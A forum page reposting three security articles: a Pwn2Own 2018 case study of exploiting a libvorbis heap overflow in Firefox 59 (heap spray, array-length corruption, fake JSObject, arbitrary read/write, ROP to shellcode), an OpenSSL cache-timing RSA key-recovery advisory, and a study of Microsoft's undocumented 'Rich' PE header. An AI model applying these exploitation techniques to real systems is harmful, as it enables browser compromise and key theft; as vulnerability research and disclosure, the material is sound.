Everything posted by Nytro

  1. How to kill a (Fire)fox – en

April 16, 2018, admin001

Pwn2own 2018 Firefox case study
Author: Hanming Zhang from 360 vulcan team

1. Debug Environment

OS: Windows 10
Firefox_Setup_59.0.exe SHA1: 294460F0287BCF5601193DCA0A90DB8FE740487C
Xul.dll SHA1: E93D1E5AF21EB90DC8804F0503483F39D5B184A9

2. Patch Information

The issue is tracked in Mozilla's Bugzilla as Bug 1446062. The vulnerability used at Pwn2Own 2018 was assigned CVE-2018-5146. According to the Mozilla security advisory, the vulnerability comes from libvorbis, a third-party media library. The next section introduces some basic information about this library.

3. Ogg and Vorbis

3.1. Ogg

Ogg is a free, open container format maintained by the Xiph.Org Foundation. An Ogg file consists of a number of Ogg Pages, and each Ogg Page contains one Ogg Header and one Segment Table. The structure of an Ogg Page is illustrated in the following picture.

Pic.1 Ogg Page Structure

3.2. Vorbis

Vorbis is a free and open-source software project headed by the Xiph.Org Foundation. In an Ogg file, the data related to Vorbis is encapsulated in the Segment Table inside an Ogg Page. An MIT document shows the encapsulation process.

3.2.1. Vorbis Header

Vorbis has three kinds of header. For a Vorbis bitstream, all three headers must be present:

Vorbis Identification Header
    Identifies the Ogg bitstream as Vorbis. It contains information such as the Vorbis version and basic audio information about the bitstream, including the number of channels and the bitrate.
Vorbis Comment Header
    Contains user-defined comments, such as vendor information.
Vorbis Setup Header
    Contains the information used to set up the codec, such as the complete VQ and Huffman codebooks used for decoding.

3.2.2. Vorbis Identification Header

The structure of the Vorbis Identification Header is illustrated below:

Pic.2 Vorbis Identification Header Structure

3.2.3. Vorbis Setup Header

The Vorbis Setup Header is more complicated than the other headers because it contains substructures such as codebooks. After the "vorbis" string comes the number of CodeBooks, followed by that many CodeBook objects. Next come the TimeBackends, FloorBackends, ResiduesBackends, MapBackends and Modes. The Vorbis Setup Header can be roughly illustrated as follows:

Pic.3 Vorbis Setup Header Structure

3.2.3.1. Vorbis CodeBook

According to the Vorbis spec, a CodeBook structure is laid out as follows:

    byte 0: [ 0 1 0 0 0 0 1 0 ] (0x42)
    byte 1: [ 0 1 0 0 0 0 1 1 ] (0x43)
    byte 2: [ 0 1 0 1 0 1 1 0 ] (0x56)
    byte 3: [ X X X X X X X X ]
    byte 4: [ X X X X X X X X ] [codebook_dimensions] (16 bit unsigned)
    byte 5: [ X X X X X X X X ]
    byte 6: [ X X X X X X X X ]
    byte 7: [ X X X X X X X X ] [codebook_entries] (24 bit unsigned)
    byte 8: [ X ] [ordered] (1 bit)
    byte 8: [ X 1 ] [sparse] flag (1 bit)

After this header comes a length_table array whose length equals codebook_entries. Each element of the array is 5 or 6 bits long, depending on the flag. It is followed by the VQ-related structure:

    [codebook_lookup_type]    4 bits
    [codebook_minimum_value]  32 bits
    [codebook_delta_value]    32 bits
    [codebook_value_bits]     4 bits and plus one
    [codebook_sequence_p]     1 bit

Finally there is a VQ-table array of length codebook_dimensions * codebook_entries, whose element length corresponds to codebook_value_bits.

codebook_minimum_value and codebook_delta_value are floating-point values, but to support different platforms the Vorbis spec defines its own internal "float" representation, which is converted to the system float type using the system math functions. On Windows, the value is converted to a double first and then to a float.

Together, all of the above make up a CodeBook structure.

3.2.3.2. Vorbis Time

In the current Vorbis spec this data structure is only a placeholder, and all of its data should be zero.

3.2.3.3. Vorbis Floor

The current Vorbis spec defines two different FloorBackend structures, but they are not relevant to the vulnerability, so we skip them.

3.2.3.4. Vorbis Residue

The current Vorbis spec defines three kinds of ResidueBackend, and each kind calls a different decode function during decoding. The structure is as follows:

    [residue_begin]            24 bits
    [residue_end]              24 bits
    [residue_partition_size]   24 bits and plus one
    [residue_classifications]  6 bits and plus one
    [residue_classbook]        8 bits

residue_classbook defines which CodeBook is used when decoding this ResidueBackend.

MapBackend and Mode do not influence the exploit, so we skip them too.

4. Patch analysis

4.1. Patched Function

From the ZDI blog, we can see that the vulnerability is inside the following function:

    /* decode vector / dim granularity gaurding is done in the upper layer */
    long vorbis_book_decodev_add(codebook *book, float *a, oggpack_buffer *b, int n)
    {
      if (book->used_entries > 0) {
        int i, j, entry;
        float *t;
        if (book->dim > 8) {
          for (i = 0; i < n;) {
            entry = decode_packed_entry_number(book, b);
            if (entry == -1) return (-1);
            t = book->valuelist + entry * book->dim;
            for (j = 0; j < book->dim;) {
              a[i++] += t[j++];
            }
          }
        } else {
          /* book->dim <= 8 case elided */
        }
      }
      return (0);
    }

The first if branch contains a nested loop. The inner loop is bounded only by book->dim, yet it also advances the outer loop's variable i, and i is never checked against n inside the inner loop. So if book->dim > n, "a[i++] += t[j++]" leads to an out-of-bounds write. In this function, a is one of the arguments and t is calculated from book->valuelist.

4.2. Buffer – a

After reading some source code, I found that a is initialized in the code below:

    /* alloc pcm passback storage */
    vb->pcmend=ci->blocksizes[vb->W];
    vb->pcm=_vorbis_block_alloc(vb,sizeof(*vb->pcm)*vi->channels);
    for(i=0;i<vi->channels;i++)
      vb->pcm[i]=_vorbis_block_alloc(vb,vb->pcmend*sizeof(*vb->pcm[i]));

Each vb->pcm[i] buffer is passed into the vulnerable function as a, and its memory is allocated by _vorbis_block_alloc with a size of vb->pcmend*sizeof(*vb->pcm[i]). vb->pcmend comes from ci->blocksizes[vb->W], and ci->blocksizes is defined in the Vorbis Identification Header, so we can control the size of the memory allocated for a.

Digging into _vorbis_block_alloc, we find the call chain _vorbis_block_alloc -> _ogg_malloc -> CountingMalloc::Malloc -> arena_t::Malloc, so the memory for a lies on the mozJemalloc heap.

4.3. Buffer – t

After reading some more source code, I found that book->valuelist gets its value here:

    c->valuelist=_book_unquantize(s,n,sortindex);

The logic of _book_unquantize can be summarized as follows:

    float *_book_unquantize(const static_codebook *b, int n, int *sparsemap)
    {
      long j, k, count = 0;
      if (b->maptype == 1 || b->maptype == 2) {
        int quantvals;
        float mindel = _float32_unpack(b->q_min);
        float delta = _float32_unpack(b->q_delta);
        float *r = _ogg_calloc(n * b->dim, sizeof(*r));
        switch (b->maptype) {
        case 1:
          quantvals=_book_maptype1_quantvals(b);
          // do some math work
          break;
        case 2:
          float val=b->quantlist[j*b->dim+k];
          // do some math work
          break;
        }
        return (r);
      }
      return (NULL);
    }

So book->valuelist holds the data decoded from the corresponding CodeBook's VQ data. It lies on the mozJemalloc heap too.

4.4. Cola Time

So now we can see that, when the vulnerability is triggered:

    a lies on the mozJemalloc heap; its size is controllable.
    t lies on the mozJemalloc heap too; its content is controllable.
    book->dim is controllable.

Combining all of the above, we can perform a write on the mozJemalloc heap with a controllable offset and controllable content. But what about the controllable size?
Can this work for our exploit? Let's see how mozJemalloc works.

5. mozJemalloc

mozJemalloc is a heap manager that Mozilla developed based on jemalloc. The following global variables give some information about mozJemalloc:

    gArenas
        mDefaultArena
        mArenas
        mPrivateArenas
    gChunkBySize
    gChunkByAddress
    gChunkRTree

In mozJemalloc, memory is divided into chunks, and those chunks are attached to different arenas, which manage them. Any memory allocated by the user must lie inside one of the chunks; mozJemalloc calls such a user allocation a region. Each chunk is further divided into runs of different sizes, and each run keeps track of the status of the regions inside it through a bitmap.

5.1. Arena

In mozJemalloc, each arena is assigned an id. When the allocator needs to allocate memory, it can use the id to get the corresponding arena.

Inside the arena there is a structure called mBin. It is an array in which each element is an arena_bin_t object, and each such object manages all the regions of one size in this arena. Regions of size 0x10 to 0x800 are managed by mBin. The runs used by mBin are not guaranteed to be contiguous, so mBin uses a red-black tree to manage them.

5.2. Run

The first region inside a run is used to store the run's management information, and the remaining regions are available for allocation. All regions in the same run have the same size.

When a region is allocated from a run, the allocator returns the first region not in use that is closest to the run header.

5.3. Arena Partition

In the current code branch of mozilla-central, all JavaScript memory allocations and frees go through functions with the moz_arena_ prefix, and these functions only use the arena whose id is 1.

In mozJemalloc, an arena is either a PrivateArena or not, and the arena with id 1 is a PrivateArena. This means the ogg buffer will not be in the same arena as JavaScript objects. In this situation, we can say that the JavaScript arena is isolated from the other arenas.
But the vulnerable Firefox 59.0 for Windows does not have a PrivateArena, so we can use JavaScript objects to perform heap feng shui and run an exploit. At first I debugged on a Linux opt+debug build of Firefox; because of the arena partition it was hard to find a way to write an exploit there, and so far I can only get an info leak on Linux.

6. Exploit

In this section, I will show how to build an exploit based on this vulnerability.

6.1. Build Ogg file

First of all, we need to build an Ogg file that triggers the vulnerability. Part of the PoC Ogg file data is shown below:

Pic.4 PoC Ogg file partial data

We can see that codebook->dim equals 0x48.

6.2. Heap Spray

First we allocate a lot of JavaScript arrays. This exhausts all usable regions in mBin, so mozJemalloc has to map new memory and divide it into runs for mBin. Then we free those arrays in an interleaved pattern, which leaves many holes inside mBin. However, we can never know the original layout of mBin, and other objects or threads may be using mBin while we free the arrays, so the holes may not actually be interleaved. If they are not, our ogg buffer may be allocated inside a contiguous run of holes, and in that case we cannot control much of the data that follows it. To avoid this, after the interleaved free we should compensate in mBin so that the ogg buffer is allocated in a hole directly before an array.

6.3. Modify Array Length

After the heap spray, we can use _ogg_malloc to allocate a region on the mozJemalloc heap, so we can force a memory layout like this:

    |--------------------- contiguous memory ---------------------|
    [ hole ][ Array ][ ogg_malloc_buffer ][ Array ][ hole ]

When we then trigger the out-of-bounds write, we can modify the length of one of the arrays. This gives us an array object in mozJemalloc that can read out of bounds.

Then we allocate many ArrayBuffer objects in mozJemalloc.
The memory layout turns into the following:

    |--------------------- contiguous memory ---------------------|
    [ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents ]

In this situation, we can use Array_length_modified to read and write ArrayBuffer_contents. Finally, memory will look like this:

    |--------------------- contiguous memory ---------------------|
    [ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents_modified ]

6.4. Cola time again

Now we control these objects and can do the following:

    Array_length_modified
        Out-of-bound write
        Out-of-bound read
    ArrayBuffer_contents_modified
        In-bound write
        In-bound read

If we try to leak memory through Array_length_modified directly, we will read "NaN", because SpiderMonkey uses tagged values. But if we use Array_length_modified to write something into ArrayBuffer_contents_modified and then read it back through ArrayBuffer_contents_modified, we can leak pointers to JavaScript objects from memory.

6.5. Fake JSObject

We can fake a JSObject in memory by leaking some pointers and writing them into a JavaScript object, and we can then write to an address through this fake object. (Turning off the baseline JIT will help you see what is going on; the following content assumes the baseline JIT is disabled.)

Pic.5 Fake JavaScript Object

If we allocate two ArrayBuffers of the same size, they will lie in contiguous memory inside the JS::Nursery heap. The memory layout will be as follows:

    |--------------------- contiguous memory ---------------------|
    [ ArrayBuffer_1 ] [ ArrayBuffer_2 ]

Using the fake object trick, we can change the first ArrayBuffer's metadata to make SpiderMonkey think it covers the second ArrayBuffer:

    |--------------------- contiguous memory ---------------------|
    [ ArrayBuffer_1 ] [ ArrayBuffer_2 ]

We can now read and write arbitrary memory. After this, all you need is a ROP chain to get Firefox to run your shellcode.

6.6. Pop Calc?
Finally we reach our shellcode. The process context is as follows:

Pic.6 achieve shellcode

The corresponding memory chunk information is as follows:

Pic.7 memory address information

But release builds of Firefox enable the sandbox by default, so if you try to pop calc through CreateProcess, the sandbox will block it.

7. Related code and works

    Firefox Source Code
    OR'LYEH? The Shadow over Firefox by argp
    Exploiting the jemalloc Memory Allocator: Owning Firefox's Heap by argp, huku
    QUICKLY PWNED, QUICKLY PATCHED: DETAILS OF THE MOZILLA PWN2OWN EXPLOIT by thezdi

Source: http://blogs.360.cn/blog/how-to-kill-a-firefox-en/
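The out-of-bounds write described in section 4.1 of the write-up above can be modelled without touching any memory. The sketch below only counts how far the index i advances in a loop of the same shape as vorbis_book_decodev_add(); overrun_elems is a hypothetical helper, not part of libvorbis, and it assumes every decoded entry is valid.

```c
#include <assert.h>

/* Hypothetical model of the dim > 8 branch of vorbis_book_decodev_add():
 * the outer loop tests i < n only between vectors, while the inner loop
 * always advances i by dim. Returns how many elements past a[n-1] would
 * be written (0 means the write stays in bounds). */
static int overrun_elems(int n, int dim)
{
    assert(n >= 0 && dim > 0);
    int i = 0;
    while (i < n) {
        i += dim; /* stands in for dim unchecked "a[i++] += t[j++]" steps */
    }
    return i - n;
}
```

With the PoC's dim of 0x48 and an assumed n of 64 (an illustrative value, not taken from the PoC), overrun_elems(64, 0x48) reports 8 floats written past the end of a, while a dim that divides n evenly reports 0.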
  2. From: Billy Brumley <bbrumley () gmail com>
Date: Mon, 16 Apr 2018 19:46:03 +0300

Hey Folks,

We discovered 3 vulnerabilities in OpenSSL that allow cache-timing enabled attackers to recover RSA private keys during key generation.

1. BN_gcd gets called to check that _e_ and _p-1_ are relatively prime. This function is not constant time, and leaks critical GCD state leading to information on _p_.

2. During primality testing, BN_mod_inverse gets called without the BN_FLG_CONSTTIME set during Montgomery arithmetic setup. The resulting code path is not constant time, and leaks critical GCD state leading to information on _p_.

3. During primality testing, BN_mod_exp_mont gets called without the BN_FLG_CONSTTIME set during modular exponentiation, with an exponent _x_ satisfying _p - 1 = 2**k * x_ hence recovering _x_ gives you most of _p_. The resulting code path is not constant time, and leaks critical exponentiation state leading to information on _x_ and hence _p_.

OpenSSL issued CVE-2018-0737 to track this issue.

# Affected software

LibreSSL fixed these issues (nice!) way back when this was reported in Jan 2017. Looks like commits

5a1bc054398ec4d2c33e5bdc3a16eece01c8901d
952c1252f58f5f57227f5efaeec0169759c77d72

We verified that with a debugger.

OTOH, OpenSSL wanted concrete evidence of exploitability. That's what we did over the past year and a half or so. We ran with bug (1) and recover RSA keys with cache-timings, achieving roughly 30% success rate in over 10K trials on a cluster.

Affects 1.1.0, 1.0.2, and presumably all the EOL lines.

## Fixes

Recently, it looks like (1) was independently discovered, and some code changes happened. Nothing for (2) and (3).
### 1.0.2-stable

Part of the fix (1) is in commits

0d6710289307d277ebc3354105c965b6e8ba8eb0
64eb614ccc7ccf30cc412b736f509f1d82bbf897
0b199a883e9170cdfe8e61c150bbaf8d8951f3e7

In combination with our contributed patch in

349a41da1ad88ad87825414752a8ff5fdd6a6c3f

we verified with a debugger they cumulatively solve (1) (2) and (3).

### 1.1.0-stable

Part of the fix (1) is in commits

7150a4720af7913cae16f2e4eaf768b578c0b298
011f82e66f4bf131c733fd41a8390039859aafb2
9db724cfede4ba7a3668bff533973ee70145ec07

In combination with our contributed patch in

6939eab03a6e23d2bd2c3f5e34fe1d48e542e787

we verified with a debugger they cumulatively solve (1) (2) and (3).

Look for our preprint on http://eprint.iacr.org/ soon -- working title is "One Shot, One Trace, One Key: Cache-Timing Attacks on RSA Key Generation". We'll update the list with the full URL once it's posted.

# Timeline

Jan 2017: Notified OpenSSL, LibreSSL, BoringSSL
4 Apr 2018: Notified OpenSSL again, with PoC and 16 Apr, 15:00 UTC embargo
11 Apr 2018: Notified distros list
16 Apr 2018: Notified oss-security list

Thanks for reading!

Alejandro Cabrera Aldaya
Cesar Pereida Garcia
Luis Manuel Alvarez Tapia
Billy Brumley

Source: http://seclists.org/oss-sec/2018/q2/50
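Item 3 of the advisory above relies on the relation p - 1 = 2**k * x: once the odd part x leaks, only the small exponent k is left to guess. The toy sketch below shows that arithmetic with 64-bit integers. Real RSA primes are far larger, and split_pm1 and rebuild_p are hypothetical helpers for illustration, not OpenSSL functions.

```c
#include <assert.h>
#include <stdint.h>

/* Result of writing p - 1 as 2^k * x with x odd. */
typedef struct {
    unsigned k;
    uint64_t x;
} pm1_split;

/* Hypothetical helper: strip the factors of two from p - 1 (p odd, p >= 3). */
static pm1_split split_pm1(uint64_t p)
{
    assert(p >= 3 && (p & 1));
    pm1_split s = { 0, p - 1 };
    while ((s.x & 1) == 0) {
        s.x >>= 1;
        s.k++;
    }
    return s;
}

/* Rebuild the candidate p from a recovered x and a guessed k. */
static uint64_t rebuild_p(uint64_t x, unsigned k)
{
    return (x << k) + 1;
}
```

For the toy prime 97, p - 1 = 96 = 2**5 * 3, so split_pm1(97) yields k = 5 and x = 3, and rebuild_p(3, 5) gives 97 back.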
  3. The Undocumented Microsoft "Rich" Header

Date: Mar 12, 2017
Last-Modified: Feb 28, 2018

SUMMARY:

There is a bizarre undocumented structure that exists only in Microsoft-produced executables. You may have never noticed the structure even if you've scanned past it a thousand times in a hex dump. This linker-generated structure is present in millions of EXE, DLL and driver modules across the globe built after the late 90's. This was when proprietary features were introduced into both Microsoft compilers and the Microsoft Linker to facilitate its generation.

If you view the first 256 bytes of almost any module built with Microsoft development tools (such as Visual C++) or those that ship with the Windows operating system, such as KERNEL32.DLL from Windows XP SP3 (shown below), you can easily spot the signature in a hex viewer. Just look for the word "Rich" after the sequence "This program cannot be run in DOS mode":

    00000000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ.............. <--DOS header
    00000010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
    00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    00000030 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 ................
    00000040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 ........!..L.!Th <--DOS STUB
    00000050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f is program canno
    00000060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 t be run in DOS
    00000070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 mode....$.......
    00000080 17 86 20 aa 53 e7 4e f9 53 e7 4e f9 53 e7 4e f9 .. .S.N.S.N.S.N. <--Start of "Rich" Header
    00000090 53 e7 4f f9 d9 e6 4e f9 90 e8 13 f9 50 e7 4e f9 S.O...N.....P.N.
    000000A0 90 e8 12 f9 52 e7 4e f9 90 e8 10 f9 52 e7 4e f9 ....R.N.....R.N.
    000000B0 90 e8 41 f9 56 e7 4e f9 90 e8 11 f9 8e e7 4e f9 ..A.V.N.......N.
    000000C0 90 e8 2e f9 57 e7 4e f9 90 e8 14 f9 52 e7 4e f9 ....W.N.....R.N.
    000000D0 52 69 63 68 53 e7 4e f9 00 00 00 00 00 00 00 00 RichS.N......... <--End of "Rich" header
    000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    000000F0 50 45 00 00 4c 01 04 00 2c a1 02 48 00 00 00 00 PE..L...,..H.... <--PE header

When present, the "Rich" signature (DWORD value 0x68636952) can be found sandwiched (maybe "camouflaged" is a better word) between the DOS and PE headers of a Windows PE (portable executable) image. I say camouflaged, because it appears, perhaps by Microsoft's original design, to be part of the 16-bit DOS stub code, which it is not. Since many programmers probably weren't versed in 16-bit assembly even when Microsoft introduced this structure, you could argue the decision to embed something at this particular location in every executable was certainly a strategic one to help it hide in plain sight. In Microsoft-linked executables, not only does the DOS mode string begin at predictable offset 0x4E, but the "Rich" structure always seems to appear at offset 0x80; this makes sense as the DOS header has probably been hardcoded for quite some time.

Oddly enough, the "Rich" signature actually marks the end of the structure's data, whose size varies. Therefore the position of the signature as well as the total size of the structure changes from module to module. The 32-bit value that follows the signature not only marks the end of the structure itself, it happens to be the key that is used to decrypt the structure's data. Following this structure is the PE header, with a handful of zero-padded bytes in between.

Since this is an undocumented "feature" of the Microsoft linker, it is not surprising that there is no known option to disable it, short of patching (discussed below). At the time of discovery, all executables built using Microsoft language tools contained this structure (e.g. Visual C++, Visual Basic 6.x and below, MASM, etc.) causing many developers to fear the worst.
Two "seemingly" identical installations of Visual Studio building the same source code appeared to produce executables with differing "Rich" headers. This combined with the fact that the structure was encrypted led many to the assumption that Microsoft was embedding personally identifiable information, ultimately allowing any given executable to be traced back to the machine it was built with. An old 2007 post on the Sysinternals forum refers to this structure as the "Devil's Mark". Also of interest is a 2008 report on Donationcoder that Microsoft utilized the information from this structure as "evidence against several high-profile virus writers". A post from Garage4Hackers said "Microsoft uses compiler ids to prove that a virus is made on a particular machine with a particular compiler. Proving that the person owning the computer is the virus writer".

Note that while this structure is present in some .NET executables, it is not present in those that do not make use of the Microsoft linker. For example, an application composed purely of .NET Intermediate Language, such as one written in C#, does not contain this structure. For any given executable module, you can check for the existence of the "Rich" header (in addition to viewing the decoded fields) using the pelook tool with the -rh option.

Before jumping to any conclusions, let's see what Microsoft is hiding here.

AN ARRAY OF NUMERIC VALUES:

First off, the "Rich" header really isn't a header at all. It is a self-contained chunk of data that doesn't reference anything else in the executable and nothing else in the executable references it. The structure was unofficially referred to as a header because it happens to reside in the PE header area. The structure happens to be little more than an array of 32-bit (DWORD) values between two markers.

If one so chooses, the structure can even be safely zeroed-out from the executable without affecting any functionality.
Just ensure you update the PE OptionalHeader's checksum if you alter any bytes in the file; although this is not necessary if the checksum field is zero (disabled). Automated removal is possible through the peupdate tool. More recently, I found that Microsoft's editbin (in version 7.x and up) will also zero-out the "Rich" structure using the undocumented /nostub switch however this also removes the PE header offset from the DOS header effectively breaking the executable. Using editbin is therefore not recommended. Other removal options are discussed in the section, Patching the Microsoft Linker below. In the KERNEL32.DLL sample above, the DWORD following the "Rich" sequence happens to have the value 0xF94EE753. This is the XOR key stored by and calculated by the linker. It is actually a checksum of the DOS header with the e_lfanew (PE header offset) zeroed out, and additionally includes the values of the unencrypted "Rich" array. Using a checksum with encryption will not only obfuscate the values, but it also serves as a rudimentary digital signature. If the checksum is calculated from scratch once the values have been decrypted, but doesn't match the stored key, it can be assumed the structure had been tampered with. For those that go the extra step to recalculate the checksum/key, this simple protection mechanism can be bypassed. To decrypt the array, start with the DWORD just prior to the "Rich" sequence and XOR it with the key. Continue the loop backwards, 4 bytes at a time, until the sequence "DanS" (0x536E6144) is decrypted. This value marks the start of the structure, and in practice always seems to reside at offset 0x80. I think a lot of tools that parse the "Rich" structure rely on it starting at offset 0x80. I'd personally recommend against relying on this fact and parsing backwards from the "Rich" signature as described above to handle situations where this may not be the case. 
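The backward-parsing procedure described above can be sketched in C as follows. This is a minimal illustration rather than a reference parser: rich_locate and rd32 are hypothetical names, the sketch assumes the "Rich" signature sits on a 4-byte boundary, and it does not recompute or verify the checksum.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define RICH_SIG 0x68636952u /* "Rich" */
#define DANS_SIG 0x536E6144u /* "DanS" */

/* Read a little-endian DWORD from a byte buffer. */
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical helper: find "Rich" (assumed DWORD-aligned), take the DWORD
 * after it as the XOR key, then walk backwards 4 bytes at a time until a
 * DWORD decrypts to "DanS". Returns 0 and fills in the offsets of the start
 * marker and of the "Rich" signature plus the key, or -1 if not found. */
static int rich_locate(const uint8_t *img, size_t len,
                       size_t *start, size_t *end, uint32_t *key)
{
    for (size_t off = 0; off + 8 <= len; off += 4) {
        if (rd32(img + off) != RICH_SIG)
            continue;
        uint32_t k = rd32(img + off + 4);
        for (size_t p = off; p >= 4; ) {
            p -= 4;
            if ((rd32(img + p) ^ k) == DANS_SIG) {
                *start = p;
                *end = off;
                *key = k;
                return 0;
            }
        }
        return -1; /* "Rich" present but no start marker before it */
    }
    return -1;
}
```

Because the search runs backwards from the signature, nothing in the sketch depends on the structure starting at offset 0x80.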
Since this is an undocumented structure, I think it's best to avoid any assumptions such as hardcoded offsets, especially since you must search for the signature "Rich" anyway. With that said, I have yet to encounter an executable where offset 0x80 is not the start; that is, if the structure is present at all.

Following the decoding procedure using the KERNEL32.DLL sample shown above, we end up with the following "Rich" structure where all values have been decrypted, and the array is listed beginning at offset 0x80 in ascending order:

    OFFSET  DATA
    ------  ----------
    0080    0x536E6144  //"DanS" signature (decrypted) / START MARKER
    0084    0x00000000  //padding
    0088    0x00000000  //padding
    008C    0x00000000  //padding
    0090    0x00010000  //1st id/value pair   entry #1
    0094    0x0000018A  //1st use count       id1=0,uses=394
    0098    0x005D0FC3  //2nd id/value pair   entry #2
    009C    0x00000003  //2nd use count       id93=4035,uses=3
    00A0    0x005C0FC3  //3rd id/value pair   entry #3
    00A4    0x00000001  //3rd use count       id92=4035,uses=1
    00A8    0x005E0FC3  //4th id/value pair   entry #4
    00AC    0x00000001  //4th use count       id94=4035,uses=1
    00B0    0x000F0FC3  //5th id/value pair   entry #5
    00B4    0x00000005  //5th use count       id15=4035,uses=5
    00B8    0x005F0FC3  //6th id/value pair   entry #6
    00BC    0x000000DD  //6th use count       id95=4035,uses=221
    00C0    0x00600FC3  //7th id/value pair   entry #7
    00C4    0x00000004  //7th use count       id96=4035,uses=4
    00C8    0x005A0FC3  //8th id/value pair   entry #8
    00CC    0x00000001  //8th use count       id90=4035,uses=1
    00D0    0x68636952  //"Rich" signature    END MARKER
    00D4    0xF94EE753  //XOR key

The array stores entries that are 8 bytes each, broken into 3 members. Each entry represents either a tool that was employed as part of building the executable or a statistic. You'll notice there are some zero-padded DWORDs adjacent to the "DanS" start marker. In practice, Microsoft seems to have wanted the entries to begin on a 16-byte (paragraph) boundary, so the 3 leading padding DWORDs can be safely skipped as not belonging to the data.
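The annotations in the decoded table (for example 0x005D0FC3 followed by 0x00000003 shown as id93=4035,uses=3) can be reproduced with a few shifts and masks. The sketch below assumes the pair of DWORDs has already been decrypted; rich_entry and rich_split are hypothetical names chosen for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* One decrypted 8-byte entry, split into its three members. */
typedef struct {
    uint16_t id;    /* high-order WORD of the first DWORD */
    uint16_t build; /* low-order WORD of the first DWORD */
    uint32_t uses;  /* second DWORD: use/occurrence count */
} rich_entry;

/* Hypothetical helper: split one decrypted DWORD pair into id, build, uses. */
static rich_entry rich_split(uint32_t first, uint32_t second)
{
    rich_entry e;
    e.id = (uint16_t)(first >> 16);
    e.build = (uint16_t)(first & 0xFFFFu);
    e.uses = second;
    return e;
}
```

Applied to the second entry of the KERNEL32.DLL sample, rich_split(0x005D0FC3, 0x00000003) gives id 93, build 4035 and 3 uses, matching the table.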
Each 8-byte entry consists of two 16-bit WORD values followed by a 32-bit DWORD. The HIGH order WORD is an id which indicates the entry type. The LOW order WORD contains the build number of the tool being represented (when applicable), or it may be set to zero. The next DWORD is a full 32-bit "use" or "occurrence" count.

THE ID VALUE:

The id value indicates the type of the list entry. For example, a specific id will represent OBJ files generated as a result of the use of a specific version of the C compiler. Different ids represent other tools that were also employed as part of building the final executable, such as the linker. Daniel Pistelli's article, Microsoft's Rich Signature (undocumented), found that the id values are a private enumeration that change between releases of Visual Studio. I have also found this to be the case, which unfortunately makes them a bit of a moving target to decipher.

Besides a couple of exceptions which I'll explain below, the id is emitted by each compiler (or assembler) and is stored within each OBJ (and thus LIB) file linked against in the form of the "@comp.id" symbol. The "@comp.id" symbol happens to be short for "compiler build number" and "id". In fact, the DWORD value stored as the "@comp.id" symbol is the same DWORD being stored in the first half of applicable "Rich" list entries. I say applicable because not all list entries represent OBJ files. Some ids can appear more than once in the list, while others do not. The id typically represents the following statistics:

    OBJ count for specific C compiler (cl.exe)
    OBJ count for specific C++ compiler (cl.exe)
    OBJ count for specific assembler (ml.exe)
    specific linker that built module (link.exe)
    specific resource compiler (rc.exe), when RES file linked
    imported functions count
    MSIL modules
    PGO Instrumented modules
    and so on...

Most of the entries above have an associated build number of the tool being represented, such as the compiler, assembler and linker.
One exception to this is the imported functions count, which happens to be the total number of imported functions referenced in all DLLs. This is usually the only entry with a build number of zero. Note that the "Rich" structure does not store information on the number of static/private functions within each OBJ/source file.

The linker entry is always last in the list and represents the linker that built the module. The resource compiler, when present, is almost always 2nd to last in the list, next to the linker. Both the linker and resource compiler are represented by hardcoded id and build values for each linker release. For example, when a resource script is employed, the linker uses the same id/build pair even if the RES is built from a resource compiler from another version of Visual Studio! Another oddity is that the build value of the resource compiler entry typically does not match the build reported by the rc.exe command line. The correlation of unique build values to specific versions of Visual Studio tools is discussed in more detail below.

The linker seems to build most "Rich" structures in the following order, though not necessarily in the order appearing on the command line:

    Entries representing LIB files
    Entries representing individual OBJ files
    Resource Compiler
    Linker

At first glance you might guess that each referenced LIB file would represent one entry in the list, but this is not the case. The linker may generate one or more entries for each LIB file depending on the number of unique "@comp.id" values found within. Since a LIB file is not much more than a concatenation of OBJ files, the resulting "count" member of each of these entries is the number of OBJ files referenced in the final executable that contain that exact "@comp.id" value. For example, statically linking to the Standard C Library usually generates assembler and C OBJ entries because that is what constitutes the source files internally used by Microsoft to build LIBCMT.LIB.
When you link against this library, the unique "@comp.id" value-pairs are tallied together and the resulting counts are written to the list. With that in mind, the "Rich" structure in KERNEL32.DLL can be annotated as follows:

    id1=0,uses=394        394 imports
    id93=4035,uses=3      ???
    id92=4035,uses=1      ???
    id94=4035,uses=1      1 rc script
    id15=4035,uses=5      5 asm sources
    id95=4035,uses=221    221 C sources
    id96=4035,uses=4      4 C++ sources
    id90=4035,uses=1      Linker

Here's another annotated example derived from a minimal C++ application linked with a resource script and the Standard C Library built from Visual C++ 7.1:

    id15=6030,uses=20     20 asm sources
    id95=6030,uses=68     68 C sources
    id93=2067,uses=2      ???
    id93=2179,uses=3      ???
    id1=0,uses=3          3 imports
    id96=6030,uses=1      1 C++ source
    id94=3052,uses=1      1 rc script
    id90=6030,uses=1      Linker

Below is my attempt at a partial list of decoded ids from the version 6 and 7 Visual Studio toolsets based on a little trial and error. Note that many of the ids originate from the LIB files bundled with the associated Visual C++ SDK versions, as the linker only hardcodes a few of the entries at the end of the list. It is also common to see a reference to MASM even when MASM is not utilized directly by a project as these references are pulled in automatically by the linker or SDK LIB files.
Microsoft Visual Studio 6.0 SP6

    ID   MEANING
    1    total count of imported DLL functions referenced; build number is always zero
    4    seems to be associated when linking against Standard C Library DLL
    19   seems to be associated when statically linking against Standard C Library
    6    resource compiler; almost always last in list (when RES file used) and use-count always 1
    9    count of OBJ files for Visual Basic 6.0 forms
    13   count of OBJ files for Visual Basic 6.0 code
    10   count of C OBJ files from specific cl.exe compiler
    11   count of C++ OBJ files from specific cl.exe compiler
    14   count of assembler OBJ files originating from MASM 6.13
    18   count of assembler OBJ files originating from MASM 6.14
